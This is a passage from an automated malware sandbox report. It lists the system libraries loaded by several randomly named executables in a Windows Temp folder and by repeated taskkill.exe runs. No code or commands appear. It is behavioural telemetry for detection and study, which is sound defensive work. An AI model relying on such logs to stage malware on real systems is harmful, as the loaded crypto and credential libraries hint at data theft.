                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exeSection loaded: dpapi.dll
